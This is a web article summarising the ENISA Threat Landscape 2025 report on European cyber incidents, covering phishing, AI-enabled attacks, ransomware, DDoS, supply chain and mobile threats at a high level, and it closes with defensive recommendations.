ENISA Threat Landscape 2025 Guide | Libertify

Executive Overview: Key Findings from ENISA 2025

The European Union Agency for Cybersecurity (ENISA) has released its comprehensive Threat Landscape 2025 report, analyzing 4,875 cybersecurity incidents occurring between July 2024 and June 2025. This landmark study reveals a cybersecurity environment characterized by increasing sophistication, AI integration, and targeted attacks on critical infrastructure.

The report’s most striking finding centers on phishing’s continued dominance as the primary attack vector, responsible for 60% of successful intrusions. This statistic underscores the persistent human element in cybersecurity failures, even as organizations invest billions in technical defenses. ENISA’s analysis demonstrates that traditional security awareness training has proven insufficient against increasingly sophisticated social engineering campaigns.

Beyond phishing, the landscape shows vulnerability exploitation accounting for 21.3% of attack vectors, while DDoS incidents comprise 76.7% of recorded events. These statistics paint a picture of cybercriminals employing both precision targeting through vulnerabilities and broad disruption through denial-of-service attacks. The convergence of these threat vectors creates a complex challenge for cybersecurity professionals worldwide.

Perhaps most concerning is the rapid integration of artificial intelligence into attack methodologies. The report documents over 80% of social engineering campaigns utilizing AI assistance during the observation period, marking a fundamental shift in how cybercriminals develop and execute their operations. This AI enhancement enables attackers to scale personalized phishing campaigns and create convincing impersonation attempts at unprecedented levels.

Phishing Dominance: The Primary Cyber Attack Vector

Phishing continues to evolve beyond simple email campaigns, incorporating sophisticated techniques that challenge traditional security measures. The ENISA report identifies several emerging phishing methodologies that organizations must address to maintain effective defenses against social engineering attacks.

Phishing-as-a-Service (PhaaS) platforms have democratized access to advanced phishing tools, enabling low-skilled attackers to launch sophisticated campaigns. These platforms provide pre-built templates, hosting infrastructure, and credential harvesting capabilities, effectively lowering the barrier to entry for cybercriminal activities. The commercialization of phishing tools has led to a significant increase in campaign volume and sophistication across all sectors.

QR code phishing, termed “quishing” by security researchers, represents a particularly effective evolution of traditional phishing techniques. By embedding malicious URLs within QR codes, attackers bypass many email security filters and exploit users’ trust in quick response codes. This technique proves especially effective in mobile-first environments where users routinely scan codes for legitimate business purposes.

The “ClickFix” methodology represents another sophisticated approach, utilizing clipboard manipulation and PowerShell execution to compromise target systems. These attacks often masquerade as software updates or system fixes, leveraging users’ desire to resolve perceived technical issues. The psychological manipulation inherent in these campaigns demonstrates the evolution beyond simple credential harvesting toward direct system compromise.

Organizations looking to combat evolving phishing threats should explore interactive cybersecurity training programs that simulate real-world attack scenarios and help employees recognize sophisticated social engineering attempts.

AI-Enhanced Cybersecurity Threats and Attack Methods

Artificial intelligence has fundamentally transformed the cybersecurity threat landscape, with malicious actors leveraging AI technologies to enhance attack effectiveness, scale operations, and evade traditional security controls. The ENISA report documents a concerning trend of AI weaponization across multiple attack vectors.

Jailbroken large language models such as WormGPT and FraudGPT have emerged as powerful tools for generating malicious content, including phishing emails, malware code, and social engineering scripts. These modified AI systems remove safety constraints present in commercial AI platforms, enabling cybercriminals to automate content creation at scale. The availability of these tools on dark web marketplaces has democratized AI-powered attack capabilities.

Stand-alone malicious AI systems like Xanthorox represent the next evolution in AI-powered cyber threats. These specialized tools combine natural language processing with attack automation, enabling dynamic response to security measures and adaptive attack methodologies. Unlike traditional malware with static behaviors, AI-powered threats can modify their approach based on target responses and defensive actions.

Deepfake technology has introduced unprecedented challenges for organizational security, particularly in business email compromise (BEC) scenarios. Attackers can now create convincing audio and video content impersonating executives, board members, or trusted partners. These deepfake attacks have proven particularly effective in financial fraud scenarios, where urgent requests for fund transfers or sensitive information appear to come from legitimate sources.

Supply chain attacks targeting AI infrastructure represent an emerging threat vector with potentially catastrophic consequences. The report documents instances of poisoned machine learning models, compromised training data, and backdoors in AI development tools. As organizations increasingly integrate AI into core business processes, these supply chain vulnerabilities create new attack surfaces for sophisticated threat actors.

The NIST AI Risk Management Framework provides essential guidance for organizations seeking to secure their AI implementations against emerging threats and vulnerabilities.

Vulnerability Exploitation and Rapid Weaponization Trends

The 2025 threat landscape reveals an acceleration in vulnerability exploitation timelines, with cybercriminals weaponizing disclosed vulnerabilities at unprecedented speeds. ENISA’s analysis shows that 70% of vulnerability-based incidents result in successful intrusions, highlighting the critical importance of rapid patch management and vulnerability prioritization.

The concept of “zero-day to exploit” timelines has compressed dramatically, with some vulnerabilities being exploited within hours of public disclosure. This rapid weaponization challenges traditional patch management approaches that rely on monthly update cycles or lengthy testing periods. Organizations must now balance system stability with security urgency in their vulnerability response strategies.

Several high-impact vulnerabilities dominated the 2025 landscape, including remote code execution flaws in popular software platforms and server-side request forgery (SSRF) vulnerabilities. CVE-2024-27564 exemplifies the rapid exploitation pattern, with proof-of-concept code appearing within 24 hours of disclosure and active exploitation detected across multiple sectors within 48 hours.

Supply chain vulnerabilities in development tools and platforms have emerged as particularly attractive targets for threat actors. The compromise of package repositories, integrated development environments, and continuous integration/continuous deployment (CI/CD) pipelines enables attackers to inject malicious code into multiple downstream applications simultaneously.

The emergence of specialized vulnerability disclosure marketplaces has created new dynamics in the exploit economy. While these platforms aim to facilitate responsible disclosure and bug bounty programs, they also create opportunities for malicious actors to acquire detailed vulnerability information and exploit code. Organizations must monitor these platforms as part of their threat intelligence operations.

Effective vulnerability management requires more than traditional scanning approaches. Consider implementing comprehensive risk assessment frameworks that prioritize vulnerabilities based on business impact and threat intelligence rather than severity scores alone.

DDoS Attacks and Hacktivist Campaign Evolution

Distributed Denial of Service (DDoS) attacks continue to dominate the cybersecurity incident landscape, accounting for 76.7% of recorded events in the ENISA 2025 analysis. However, the nature and motivation behind these attacks have evolved significantly, with hacktivist groups leveraging DDoS as a tool for political expression and social disruption.

Modern hacktivist campaigns demonstrate sophisticated coordination and targeting strategies, moving beyond simple website defacements to sustained disruption campaigns against critical infrastructure. These groups leverage social media platforms and encrypted communication channels to organize distributed attacks, often mobilizing thousands of participants for coordinated assault campaigns.

The convergence of hacktivist, cybercriminal, and state-aligned threat actors has created complex attribution challenges for incident response teams. “Faketivism” campaigns utilize hacktivist branding to mask state-sponsored operations, while legitimate hacktivist groups may unknowingly serve the interests of nation-state actors through their disruptive activities.

Low-cost, high-impact DDoS techniques have democratized the ability to launch disruptive attacks. Cloud-based attack infrastructure, IoT botnets, and amplification techniques enable attackers to generate massive traffic volumes with minimal resource investment. These attacks particularly target public administration systems, exploiting their public-facing nature and critical service delivery functions.

The geographic concentration of DDoS attacks reveals strategic targeting patterns, with France experiencing 27% of public administration incidents, followed by Italy at 26.3% and Germany at 16.2%. This distribution suggests coordinated campaigns rather than opportunistic attacks, indicating sophisticated threat actor planning and execution.

Ransomware Ecosystem Transformation in 2025

The ransomware landscape has undergone significant transformation following intensified law enforcement pressure and international cooperation efforts. While traditional ransomware groups have adapted their operations, new actors have emerged to fill operational gaps, creating a more decentralized and resilient criminal ecosystem.

Ransomware-as-a-Service (RaaS) platforms continue to proliferate despite law enforcement actions against major groups. These platforms enable affiliate attackers to access sophisticated encryption tools, payment infrastructure, and victim negotiation services without developing technical capabilities independently. The commercialization of ransomware operations has led to increased specialization and professionalization within criminal networks.

New extortion techniques have emerged as organizations improve backup and recovery capabilities. Double extortion campaigns that combine data encryption with data theft and leak threats have proven particularly effective. Triple extortion adds additional pressure through direct victim contact, customer notification, and regulatory disclosure threats. Some groups now pursue extortion without encryption, focusing solely on data theft and leak threats.

The targeting of supply chain partners and managed service providers represents a strategic evolution in ransomware operations. By compromising a single managed service provider, attackers can potentially impact dozens of downstream organizations simultaneously. This approach maximizes return on investment while complicating incident response and recovery efforts.

Notable ransomware families documented in the report include NightSpire, SafePay, and Stormous, each demonstrating unique technical capabilities and targeting strategies. The apparent reduction in LockBit activity during the reporting period illustrates the impact of coordinated law enforcement operations on established ransomware groups.

Supply Chain and Third-Party Security Vulnerabilities

Supply chain attacks have emerged as one of the most significant threats in the 2025 cybersecurity landscape, with attackers recognizing the multiplicative impact of compromising shared infrastructure, software components, and service providers. ENISA’s analysis reveals a concerning trend toward sophisticated supply chain targeting across multiple vectors.

Software repository compromises represent a particularly insidious form of supply chain attack. Malicious packages in npm, PyPI, and other popular repositories can propagate to thousands of applications without detection. These attacks often utilize typosquatting, dependency confusion, and maintainer account compromise to inject malicious code into legitimate software supply chains.

Browser extension compromise has become an increasingly popular attack vector, leveraging users’ trust in browser add-ons and extensions. Attackers compromise legitimate extensions through developer account takeover or inject malicious updates into popular extensions. Once installed, these compromised extensions can harvest credentials, intercept communications, and serve as persistent backdoors into target organizations.

Managed Service Provider (MSP) targeting represents perhaps the most impactful form of supply chain attack. By compromising a single MSP, attackers can gain access to multiple customer environments simultaneously. The interconnected nature of modern IT services means that MSP compromise can cascade across entire industry sectors or geographic regions.

AI supply chain vulnerabilities represent an emerging concern as organizations increasingly integrate artificial intelligence into core business processes. Attacks on AI infrastructure include poisoned training data, compromised models, and backdoors in AI development frameworks. The complexity and opacity of AI systems make these vulnerabilities particularly challenging to detect and mitigate.

Organizations must implement comprehensive vendor management frameworks that address third-party risk assessment, continuous monitoring, and incident response coordination across the entire supply chain ecosystem.

Mobile and Telecommunications Threat Landscape

Mobile devices and telecommunications infrastructure face increasing sophisticated attacks as these platforms become central to business operations and personal communications. The ENISA report documents significant evolution in mobile-specific threats, with attackers exploiting both device-level vulnerabilities and telecommunications protocol weaknesses.

Android Remote Access Trojans (RATs) have proliferated across European markets, with families such as Rafel, BingoMod, KoSpy, BoneSpy, PlainGnome, and EagleMsgSpy targeting specific geographic regions. These sophisticated malware families demonstrate advanced capabilities including keylogging, screen recording, financial application monitoring, and SMS interception.

Banking trojans specifically targeting mobile platforms have evolved to bypass traditional two-factor authentication systems. The Medusa banking trojan exemplifies these capabilities, intercepting SMS messages, overlaying legitimate banking applications with fraudulent interfaces, and stealing authentication credentials in real-time. These threats pose particular challenges for financial institutions relying on SMS-based authentication systems.

Telecommunications protocol vulnerabilities in SS7 and Diameter systems enable sophisticated attackers to intercept communications, track locations, and redirect phone calls. These protocol-level attacks require privileged access to telecommunications infrastructure, typically limiting them to nation-state actors or advanced criminal organizations with insider access to telecommunications providers.

Digital Signal Processor (DSP) vulnerabilities in mobile chipsets have emerged as a new attack vector, with Qualcomm chipsets experiencing notable security flaws during the reporting period. These low-level vulnerabilities can enable persistent device compromise, bypassing traditional mobile device management (MDM) and security controls.

Mobile-specific campaigns have been documented across multiple European countries, with particular activity in Czechia, France, Germany, Italy, and Romania. The geographic distribution of these campaigns suggests both opportunistic and targeted approaches, with some attacks focusing on specific industries or high-value individuals.

The CISA Mobile Device Security guidelines provide comprehensive recommendations for organizations seeking to protect mobile devices and telecommunications infrastructure from evolving threats.

Sector-Specific Cybersecurity Risks and Impacts

The ENISA 2025 report reveals significant variation in cybersecurity threats across different economic sectors, with public administration bearing the heaviest attack burden while critical infrastructure sectors face increasingly sophisticated targeting strategies.

Public administration leads all sectors with 38.2% of attributed cybersecurity incidents, driven primarily by hacktivist-led DDoS campaigns accounting for 96.2% of DDoS attacks against this sector. The public-facing nature of government services, combined with their symbolic value for political protest, makes public administration an attractive target for disruptive attacks.

The transport sector has emerged as a high-priority target, accounting for 7.5% of incidents with particular focus on maritime, logistics, and aviation systems. Ransomware attacks against transport infrastructure can cascade across supply chains, affecting freight movement, passenger services, and economic activity. Recent incidents have targeted ticketing systems, freight management platforms, and airport operations.

Digital infrastructure and services face strategic targeting by sophisticated threat actors seeking to compromise multiple downstream organizations simultaneously. At 4.8% of incidents, this sector experiences some of the most technically advanced attacks, including supply chain compromises and advanced persistent threat (APT) campaigns aimed at long-term access and data collection.

Financial services continue to attract cybercriminal attention, representing 4.5% of incidents with particular focus on banking trojans, mobile fraud, and credential theft operations. The financial sector’s regulatory requirements and customer data sensitivity make it an attractive target for both financially motivated cybercriminals and espionage-focused threat actors.

Manufacturing faces increasing cyber threats as industrial systems become more connected and integrated with corporate networks. At 2.9% of incidents, manufacturing targets include both intellectual property theft and operational technology (OT) disruption, with attacks potentially affecting production schedules, quality control, and safety systems.

Critical Defense Strategies and Recommendations

The evolving threat landscape documented in ENISA’s 2025 report demands a comprehensive and adaptive approach to cybersecurity defense. Organizations must implement layered security strategies that address both technical vulnerabilities and human factors while remaining agile enough to counter emerging threats.

Phishing-resistant multi-factor authentication represents perhaps the most critical defense investment organizations can make. Traditional SMS-based authentication and email-delivered codes prove inadequate against sophisticated phishing campaigns. Hardware security keys, biometric authentication, and certificate-based authentication provide significantly stronger protection against credential theft and account takeover.

Rapid vulnerability management programs must replace traditional monthly patch cycles with risk-based prioritization and emergency response capabilities. Organizations should implement continuous vulnerability scanning, threat intelligence integration, and automated patch deployment for critical vulnerabilities. Compensating controls should be deployed immediately for vulnerabilities that cannot be patched quickly.

Supply chain security requires comprehensive vendor assessment, continuous monitoring, and contractual security requirements. Organizations must implement Software Bill of Materials (SBOM) tracking, dependency scanning, and third-party risk assessment programs. Incident response plans must include supply chain compromise scenarios and coordination with vendor security teams.

Endpoint Detection and Response (EDR) and Extended Detection and Response (XDR) platforms provide essential visibility into advanced attacks that bypass traditional antivirus and firewall protections. These platforms enable behavioral analysis, threat hunting, and automated response to suspicious activities across endpoints, networks, and cloud environments.

Network segmentation and Zero Trust architecture implementation limit the impact of successful intrusions by restricting lateral movement and enforcing least-privilege access controls. Organizations should implement micro-segmentation, software-defined perimeters, and identity-based access controls that verify every connection attempt regardless of location or device.

AI governance frameworks must address both the security of AI systems and the use of AI in security operations. Organizations should implement AI supply chain security controls, model validation processes, and prompt injection protection while leveraging AI capabilities for threat detection, incident response, and security automation.

The NIST Cybersecurity Framework provides a comprehensive foundation for organizations developing risk-based cybersecurity programs that address the full spectrum of modern threats.